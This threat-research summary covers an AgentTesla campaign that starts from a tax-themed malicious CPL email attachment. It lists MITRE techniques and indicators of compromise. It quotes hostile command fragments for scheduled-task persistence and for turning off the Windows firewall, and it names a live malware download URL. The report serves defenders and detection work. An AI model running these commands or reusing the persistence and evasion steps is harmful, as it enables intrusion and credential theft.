Threat Research

Cyble – AgentTesla Malware Targets Users With Malicious Control Panel File

Securonix

Cyble Research and Intelligence Labs details a multi-stage AgentTesla infection chain delivered via a malicious CPL file embedded in a tax-themed spam email, which triggers PowerShell scripts and a .NET loader to inject AgentTesla. The campaign uses obfuscated scripts, startup-folder and scheduled-task persistence, and in-memory payload injection to steal credentials and other data from infected hosts.
Hashtags: #AgentTesla #Gorgees_Ghada_Tax_2021 #AdobeUpdates.vbs #Clang.vbs #PowerShell

Keypoints

  • The infection starts with a spam email containing Gorgees_Ghada_Tax 2021.cpl, leading to PowerShell execution and remote file download.
  • The CPL file contains PowerShell code that downloads a malicious script from a hardcoded Blogspot URL and executes it via powershell.exe.
  • Obfuscated binary strings in the downloaded PowerShell script are deobfuscated to reveal additional PowerShell scripts, an executable, and a DLL.
  • A .NET-based loader injects AgentTesla into system processes, enabling memory-resident payload execution.
  • Persistence is achieved through startup-folder scripts (AdobeUpdates.vbs, Clang.vbs) and a scheduled task entry created via schtasks.
  • The AgentTesla payload exfiltrates credentials and other data and supports keylogging, clipboard theft, and more.

    • <liDefense evasion includes AMSI bypass and Windows Defender/Firewall disabling, plus UAC manipulation and extensive Defender exclusions.

MITRE Techniques

  • [T1566] Phishing – The campaign uses a malicious email with an attached CPL file to entice user action. Quote: “…This email contains an attached archive file, which includes two files, one PDF and another CPL file…”
  • [T1059] Command and Scripting Interpreter – The CPL file embeds PowerShell code that fetches and executes a script. Quote: “…PowerShell code, responsible for fetching a malicious PowerShell script from a hardcoded URL…”
  • [T1204] User Execution – The CPL file requires a double-click to run, initiating the attack chain. Quote: “…requires only a double-click to initiate its execution.”
  • [T1547.001] Startup Folder – Persistence via startup folder is employed to execute scripts at startup. Quote: “startup folder is scanned upon starting the operating system…”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – The PowerShell script creates a scheduled task to maintain persistence. Quote: “schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr … AdobeUpdates.vbs”
  • [T1140] Deobfuscate/Decode Files or Information – Obfuscated binary strings are deobfuscated to reveal payloads. Quote: “The downloaded powershell script contains several obfuscated binary strings.”
  • [T1562.001] Impair Defenses: Disable or Modify Tools – AMSI bypass and Defender manipulation are used. Quote: “stops the Windows Defender services and bypasses the AMSI.”
  • [T1562.004] Impair Defenses: Disable or Modify System Firewall – Commands disable firewall protections. Quote: “netsh advfirewall set allprofiles state off.”
  • [T1562.007] Impair Defenses: Disable or Modify Cloud Firewall – Cloud firewall impairment is indicated as a defensive tactic. Quote: “Impair Defenses: Disable or Modify Cloud Firewall.”
  • [T1071] Application Layer Protocol – C2 communications occur via HTTP(S)/application-layer channels to fetch scripts. Quote: “a hardcoded URL cawp1[.]blogspot[.]com/atom.xml”
  • [T1055] Process Injection – The .NET loader injects AgentTesla into multiple Windows processes (RegSvcs.exe and Msbuild.exe). Quote: “injects the AgentTesla executable into three distinct executables located at C:WindowsMicrosoft.NETFrameworkv4.0.30319RegSvcs.exe, …”

Indicators of Compromise

  • [URL] cawp1.blogspot.com/atom.xml – Command-and-control/download URL used by the PowerShell script
  • [MD5] Gorgees_Ghada_Tax_2021.cpl – 2220fb8ec2e0055ed544f3eccb953fdd
  • [SHA1] Gorgees_Ghada_Tax_2021.cpl – 5ea9c0fbe63b1e6755504f932d6f53e1bb0aa280
  • [SHA256] Gorgees_Ghada_Tax_2021.cpl – 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303
  • [MD5] AdobeUpdates.vbs – 2dcdda94429cdbe8d1f0c4e4a9f04e36
  • [SHA1] AdobeUpdates.vbs – d874a11d00aa240f837efd742deb028de79eaad0
  • [SHA256] AdobeUpdates.vbs – a4e6a885d3c0f0b62a3b322e3210c63977f2a5a3d0cea5e0f5be51b3d73d4054
  • [MD5] Clang.vbs – 2dcdda94429cdbe8d1f0c4e4a9f04e36
  • [SHA1] Clang.vbs – d874a11d00aa240f837efd742deb028de79eaad0
  • [SHA256] Clang.vbs – a4e6a885d3c0f0b62a3b322e3210c63977f2a5a3d0cea5e0f5be51b3d73d4054
  • [MD5] Sexology.~!!!!!!!!!!!!!!!!~ – dc580fd8c70ed8d35c129cf4b45c7dc2
  • [SHA1] Sexology.~!!!!!!!!!!!!!!!!~ – 4fded1fc42e6cd755c9829b91825d6a2ce1a364c
  • [SHA256] Sexology.~!!!!!!!!!!!!!!!!~ – 3f778a91bd64a8130d52f3ecee3806838688a171b6bde05372a238a6e4aba2cd
  • [MD5] AgentTesla – 8f9de3ce238e237cc649d2db9fe890af
  • [SHA1] AgentTesla – b3fb0379b4e2679c0c1fa350b7962c2f54dd068b
  • [SHA256] AgentTesla – 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e
  • [MD5] .NET loader – 4729b73425c811e8b9c4142504c7500d
  • [SHA1] .NET loader – 4617ddabccc0aeb4ce669b370de3079410657fe0
  • [SHA256] .NET loader – 38b41ad398e4807cb6153eebc0bfff248799ac94d842766d47c37d8a288b720e

Read more: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint